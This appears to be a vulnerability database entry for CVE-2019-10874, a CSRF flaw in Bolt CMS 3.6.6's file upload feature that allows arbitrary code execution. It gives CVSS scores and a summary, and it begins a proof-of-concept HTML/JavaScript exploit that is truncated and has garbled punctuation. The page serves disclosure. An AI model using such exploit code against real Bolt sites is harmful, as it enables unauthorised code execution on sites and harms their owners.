6.8
CVSSv2

CVE-2019-10874

Published: 05/04/2019 Updated: 04/01/2021
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Cross Site Request Forgery (CSRF) in the bolt/upload File Upload feature in Bolt CMS 3.6.6 allows remote malicious users to execute arbitrary code by uploading a JavaScript file to include executable extensions in the file/edit/config/config.yml configuration file.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

boltcms bolt 3.6.6

Exploits

<html> <body> <script>historypushState('', '', '/')</script> <script> function exploit() { var target = "127001" var bolt_admin_url = target + "/bolt"; var xhr = new XMLHttpRequest(); xhropen("POST", bolt_admin_url + "/upload", true); xhrsetRequestHe ...